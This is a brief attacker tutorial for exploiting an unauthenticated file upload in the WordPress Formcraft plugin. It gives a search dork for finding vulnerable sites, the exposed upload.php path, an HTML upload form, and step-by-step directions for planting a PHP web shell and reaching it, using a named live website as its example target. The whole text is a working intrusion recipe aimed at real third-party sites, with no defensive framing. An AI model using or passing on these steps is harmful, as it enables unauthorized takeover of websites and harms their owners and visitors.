– Dork : “powered by Formcraft”
– Vuln : {“failed”:”No file found 2″}
– Exploit : wp-content/plugins/formcraft/file-upload/server/php/upload.php
– Your Accses Shell / File : wp-content/plugins/formcraft/file-upload/server/php/files/[randomcode]nameshell.php
– CSRF Script :
<form method=”POST” action=”target.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php”
enctype=”multipart/form-data”>
<input type=”file” name=”files[]” /><button>Upload</button>
</form>
Save your script use format .html
– My Target Is : http://sellfastoregon.com/
Add exploit in that link then become : http://sellfastoregon.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php
Yeahh that vuln
– Copy that link into your script
– then save use .html
– Open your script
– That is uploader
– Upload your shell
– My name of shell is : bcc.php
– Click Upload
– This is a codeshell–nameshell.php [154df070a157db—bcc.php]
– Then show up your codeshell.php
– Copy codeshell.php into url bar
– Paste your codeshell.php in the : wp-content/plugins/formcraft/file-upload/server/php/files/[codeshell]nameshell.php